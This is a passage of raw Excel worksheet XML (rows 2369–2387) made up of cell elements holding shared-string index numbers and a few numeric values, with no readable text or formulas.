        <v>21</v>
      </c>
      <c r="I2369" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2369" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K2369" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2369" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2369" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2369" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2369" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2369" s="12" t="s">
        <v>16858</v>
      </c>
      <c r="Q2369" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2369" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2369" s="12" t="s">
        <v>16859</v>
      </c>
      <c r="T2369" s="12" t="s">
        <v>16860</v>
      </c>
      <c r="U2369" s="12" t="s">
        <v>16861</v>
      </c>
      <c r="V2369" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W2369" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2369" s="12">
        <v>28</v>
      </c>
      <c r="Y2369" s="12" t="s">
        <v>16862</v>
      </c>
    </row>
    <row r="2370" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2370" s="12">
        <v>11660</v>
      </c>
      <c r="B2370" s="12" t="s">
        <v>29990</v>
      </c>
      <c r="D2370" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2370" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2370" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2370" s="12" t="s">
        <v>16863</v>
      </c>
      <c r="H2370" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2370" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2370" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K2370" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2370" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2370" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2370" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2370" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2370" s="12" t="s">
        <v>12737</v>
      </c>
      <c r="Q2370" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2370" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2370" s="12" t="s">
        <v>16864</v>
      </c>
      <c r="T2370" s="12" t="s">
        <v>16865</v>
      </c>
      <c r="U2370" s="12" t="s">
        <v>16866</v>
      </c>
      <c r="V2370" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W2370" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2370" s="12">
        <v>18</v>
      </c>
      <c r="Y2370" s="12" t="s">
        <v>16867</v>
      </c>
    </row>
    <row r="2371" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2371" s="12">
        <v>11664</v>
      </c>
      <c r="B2371" s="12" t="s">
        <v>29902</v>
      </c>
      <c r="D2371" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2371" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2371" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G2371" s="12" t="s">
        <v>16868</v>
      </c>
      <c r="H2371" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2371" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2371" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2371" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2371" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2371" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2371" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2371" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2371" s="12" t="s">
        <v>16869</v>
      </c>
      <c r="Q2371" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2371" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2371" s="12" t="s">
        <v>16870</v>
      </c>
      <c r="T2371" s="12" t="s">
        <v>16871</v>
      </c>
      <c r="U2371" s="12" t="s">
        <v>16872</v>
      </c>
      <c r="V2371" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2371" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2371" s="12">
        <v>30</v>
      </c>
      <c r="Y2371" s="12" t="s">
        <v>16350</v>
      </c>
    </row>
    <row r="2372" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2372" s="12">
        <v>11665</v>
      </c>
      <c r="B2372" s="12" t="s">
        <v>30472</v>
      </c>
      <c r="D2372" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2372" s="12" t="s">
        <v>30453</v>
      </c>
      <c r="G2372" s="12" t="s">
        <v>16873</v>
      </c>
      <c r="H2372" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2372" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2372" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K2372" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2372" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2372" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2372" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2372" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2372" s="12" t="s">
        <v>16874</v>
      </c>
      <c r="Q2372" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2372" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2372" s="12" t="s">
        <v>16875</v>
      </c>
      <c r="T2372" s="12" t="s">
        <v>16876</v>
      </c>
      <c r="U2372" s="12" t="s">
        <v>16877</v>
      </c>
      <c r="V2372" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W2372" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2372" s="12">
        <v>28</v>
      </c>
      <c r="Y2372" s="12" t="s">
        <v>16878</v>
      </c>
    </row>
    <row r="2373" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2373" s="12">
        <v>11669</v>
      </c>
      <c r="B2373" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2373" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2373" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2373" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="G2373" s="12" t="s">
        <v>16879</v>
      </c>
      <c r="H2373" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2373" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2373" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2373" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2373" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2373" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2373" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2373" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2373" s="12" t="s">
        <v>16880</v>
      </c>
      <c r="Q2373" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2373" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2373" s="12" t="s">
        <v>16881</v>
      </c>
      <c r="T2373" s="12" t="s">
        <v>8608</v>
      </c>
      <c r="U2373" s="12" t="s">
        <v>16882</v>
      </c>
      <c r="V2373" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2373" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2373" s="12">
        <v>5</v>
      </c>
      <c r="Y2373" s="12" t="s">
        <v>16883</v>
      </c>
    </row>
    <row r="2374" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2374" s="12">
        <v>11676</v>
      </c>
      <c r="B2374" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D2374" s="12" t="s">
        <v>30305</v>
      </c>
      <c r="E2374" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2374" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2374" s="12" t="s">
        <v>16884</v>
      </c>
      <c r="H2374" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2374" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2374" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2374" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2374" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2374" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2374" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2374" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2374" s="12" t="s">
        <v>16104</v>
      </c>
      <c r="Q2374" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2374" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2374" s="12" t="s">
        <v>16885</v>
      </c>
      <c r="T2374" s="12" t="s">
        <v>8568</v>
      </c>
      <c r="U2374" s="12" t="s">
        <v>16886</v>
      </c>
      <c r="V2374" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2374" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2374" s="12">
        <v>30</v>
      </c>
      <c r="Y2374" s="12" t="s">
        <v>16887</v>
      </c>
    </row>
    <row r="2375" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2375" s="12">
        <v>11693</v>
      </c>
      <c r="B2375" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2375" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2375" s="12" t="s">
        <v>31382</v>
      </c>
      <c r="G2375" s="12" t="s">
        <v>16888</v>
      </c>
      <c r="H2375" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2375" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2375" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K2375" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2375" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2375" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2375" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2375" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2375" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q2375" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2375" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2375" s="12" t="s">
        <v>16889</v>
      </c>
      <c r="T2375" s="12" t="s">
        <v>16890</v>
      </c>
      <c r="U2375" s="12" t="s">
        <v>16891</v>
      </c>
      <c r="V2375" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W2375" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2375" s="12">
        <v>14</v>
      </c>
      <c r="Y2375" s="12" t="s">
        <v>16892</v>
      </c>
    </row>
    <row r="2376" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2376" s="12">
        <v>11695</v>
      </c>
      <c r="B2376" s="12" t="s">
        <v>30954</v>
      </c>
      <c r="D2376" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2376" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F2376" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2376" s="12" t="s">
        <v>16893</v>
      </c>
      <c r="H2376" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2376" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2376" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2376" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2376" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2376" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2376" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2376" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2376" s="12" t="s">
        <v>14416</v>
      </c>
      <c r="Q2376" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2376" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2376" s="12" t="s">
        <v>16894</v>
      </c>
      <c r="T2376" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2376" s="12" t="s">
        <v>16895</v>
      </c>
      <c r="V2376" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2376" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2376" s="12">
        <v>2</v>
      </c>
      <c r="Y2376" s="12" t="s">
        <v>16896</v>
      </c>
    </row>
    <row r="2377" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2377" s="12">
        <v>11696</v>
      </c>
      <c r="B2377" s="12" t="s">
        <v>30878</v>
      </c>
      <c r="D2377" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2377" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F2377" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2377" s="12" t="s">
        <v>16897</v>
      </c>
      <c r="H2377" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2377" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2377" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2377" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2377" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2377" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2377" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2377" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2377" s="12" t="s">
        <v>14416</v>
      </c>
      <c r="Q2377" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2377" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2377" s="12" t="s">
        <v>16898</v>
      </c>
      <c r="T2377" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2377" s="12" t="s">
        <v>16899</v>
      </c>
      <c r="V2377" s="12" t="s">
        <v>5265</v>
      </c>
      <c r="W2377" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2377" s="12">
        <v>1</v>
      </c>
      <c r="Y2377" s="12" t="s">
        <v>16900</v>
      </c>
    </row>
    <row r="2378" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2378" s="12">
        <v>11699</v>
      </c>
      <c r="B2378" s="12" t="s">
        <v>30902</v>
      </c>
      <c r="C2378" s="12" t="s">
        <v>30955</v>
      </c>
      <c r="D2378" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2378" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2378" s="12" t="s">
        <v>16901</v>
      </c>
      <c r="H2378" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2378" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2378" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2378" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2378" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2378" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2378" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2378" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2378" s="12" t="s">
        <v>16902</v>
      </c>
      <c r="Q2378" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2378" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2378" s="12" t="s">
        <v>16903</v>
      </c>
      <c r="T2378" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2378" s="12" t="s">
        <v>16904</v>
      </c>
      <c r="V2378" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2378" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2378" s="12">
        <v>10</v>
      </c>
      <c r="Y2378" s="12" t="s">
        <v>16905</v>
      </c>
    </row>
    <row r="2379" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2379" s="12">
        <v>11701</v>
      </c>
      <c r="B2379" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2379" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2379" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F2379" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G2379" s="12" t="s">
        <v>16906</v>
      </c>
      <c r="H2379" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2379" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2379" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2379" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2379" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2379" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2379" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2379" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2379" s="12" t="s">
        <v>16156</v>
      </c>
      <c r="Q2379" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2379" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2379" s="12" t="s">
        <v>16907</v>
      </c>
      <c r="T2379" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2379" s="12" t="s">
        <v>16908</v>
      </c>
      <c r="V2379" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W2379" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2379" s="12">
        <v>1</v>
      </c>
      <c r="Y2379" s="12" t="s">
        <v>16909</v>
      </c>
    </row>
    <row r="2380" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2380" s="12">
        <v>11712</v>
      </c>
      <c r="B2380" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2380" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2380" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2380" s="12" t="s">
        <v>30381</v>
      </c>
      <c r="G2380" s="12" t="s">
        <v>16910</v>
      </c>
      <c r="H2380" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2380" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2380" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2380" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2380" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2380" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2380" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2380" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2380" s="12" t="s">
        <v>16911</v>
      </c>
      <c r="Q2380" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2380" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2380" s="12" t="s">
        <v>16912</v>
      </c>
      <c r="T2380" s="12" t="s">
        <v>15605</v>
      </c>
      <c r="U2380" s="12" t="s">
        <v>16913</v>
      </c>
      <c r="V2380" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2380" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2380" s="12">
        <v>16</v>
      </c>
      <c r="Y2380" s="12" t="s">
        <v>16914</v>
      </c>
    </row>
    <row r="2381" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2381" s="12">
        <v>11715</v>
      </c>
      <c r="B2381" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2381" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2381" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2381" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2381" s="12" t="s">
        <v>16915</v>
      </c>
      <c r="H2381" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2381" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2381" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K2381" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2381" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2381" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2381" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2381" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2381" s="12" t="s">
        <v>16916</v>
      </c>
      <c r="Q2381" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2381" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2381" s="12" t="s">
        <v>16917</v>
      </c>
      <c r="T2381" s="12" t="s">
        <v>16918</v>
      </c>
      <c r="U2381" s="12" t="s">
        <v>16919</v>
      </c>
      <c r="V2381" s="12" t="s">
        <v>16920</v>
      </c>
      <c r="W2381" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2381" s="12">
        <v>20</v>
      </c>
      <c r="Y2381" s="12" t="s">
        <v>16921</v>
      </c>
    </row>
    <row r="2382" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2382" s="12">
        <v>11717</v>
      </c>
      <c r="B2382" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2382" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2382" s="12" t="s">
        <v>30701</v>
      </c>
      <c r="G2382" s="12" t="s">
        <v>16922</v>
      </c>
      <c r="H2382" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2382" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2382" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K2382" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2382" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2382" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2382" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2382" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2382" s="12" t="s">
        <v>16923</v>
      </c>
      <c r="Q2382" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2382" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2382" s="12" t="s">
        <v>16924</v>
      </c>
      <c r="T2382" s="12" t="s">
        <v>16925</v>
      </c>
      <c r="U2382" s="12" t="s">
        <v>16926</v>
      </c>
      <c r="V2382" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W2382" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2382" s="12">
        <v>108</v>
      </c>
      <c r="Y2382" s="12" t="s">
        <v>16928</v>
      </c>
    </row>
    <row r="2383" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2383" s="12">
        <v>11718</v>
      </c>
      <c r="B2383" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2383" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D2383" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F2383" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G2383" s="12" t="s">
        <v>16929</v>
      </c>
      <c r="H2383" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2383" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2383" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K2383" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2383" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2383" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2383" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2383" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2383" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2383" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2383" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2383" s="12" t="s">
        <v>16930</v>
      </c>
      <c r="T2383" s="12" t="s">
        <v>8727</v>
      </c>
      <c r="U2383" s="12" t="s">
        <v>16931</v>
      </c>
      <c r="V2383" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W2383" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2383" s="12">
        <v>10</v>
      </c>
      <c r="Y2383" s="12" t="s">
        <v>16932</v>
      </c>
    </row>
    <row r="2384" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2384" s="12">
        <v>11721</v>
      </c>
      <c r="B2384" s="12" t="s">
        <v>30703</v>
      </c>
      <c r="C2384" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2384" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2384" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2384" s="12" t="s">
        <v>30702</v>
      </c>
      <c r="G2384" s="12" t="s">
        <v>16933</v>
      </c>
      <c r="H2384" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2384" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2384" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2384" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2384" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M2384" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N2384" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O2384" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2384" s="12" t="s">
        <v>14416</v>
      </c>
      <c r="Q2384" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2384" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2384" s="12" t="s">
        <v>16934</v>
      </c>
      <c r="T2384" s="12" t="s">
        <v>16935</v>
      </c>
      <c r="U2384" s="12" t="s">
        <v>16936</v>
      </c>
      <c r="V2384" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W2384" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2384" s="12">
        <v>68</v>
      </c>
      <c r="Y2384" s="12" t="s">
        <v>16937</v>
      </c>
    </row>
    <row r="2385" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2385" s="12">
        <v>11722</v>
      </c>
      <c r="B2385" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D2385" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2385" s="12" t="s">
        <v>31239</v>
      </c>
      <c r="G2385" s="12" t="s">
        <v>16938</v>
      </c>
      <c r="H2385" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2385" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2385" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2385" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2385" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2385" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2385" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2385" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2385" s="12" t="s">
        <v>16939</v>
      </c>
      <c r="Q2385" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2385" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2385" s="12" t="s">
        <v>16940</v>
      </c>
      <c r="T2385" s="12" t="s">
        <v>16941</v>
      </c>
      <c r="U2385" s="12" t="s">
        <v>16942</v>
      </c>
      <c r="V2385" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2385" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2385" s="12">
        <v>1</v>
      </c>
      <c r="Y2385" s="12" t="s">
        <v>16943</v>
      </c>
    </row>
    <row r="2386" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2386" s="12">
        <v>11725</v>
      </c>
      <c r="B2386" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2386" s="12" t="s">
        <v>30855</v>
      </c>
      <c r="F2386" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2386" s="12" t="s">
        <v>16949</v>
      </c>
      <c r="H2386" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2386" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2386" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2386" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2386" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2386" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2386" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2386" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2386" s="12" t="s">
        <v>16950</v>
      </c>
      <c r="Q2386" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2386" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2386" s="12" t="s">
        <v>16951</v>
      </c>
      <c r="T2386" s="12" t="s">
        <v>16952</v>
      </c>
      <c r="U2386" s="12" t="s">
        <v>16953</v>
      </c>
      <c r="V2386" s="12" t="s">
        <v>5265</v>
      </c>
      <c r="W2386" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2386" s="12">
        <v>13</v>
      </c>
      <c r="Y2386" s="12" t="s">
        <v>16954</v>
      </c>
    </row>
    <row r="2387" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2387" s="12">
        <v>11726</v>
      </c>
      <c r="B2387" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D2387" s="12" t="s">
        <v>30315</v>
      </c>
      <c r="F2387" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2387" s="12" t="s">
        <v>16955</v>
      </c>
      <c r="H2387" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2387" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2387" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K2387" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2387" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2387" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2387" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2387" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2387" s="12" t="s">
        <v>16726</v>
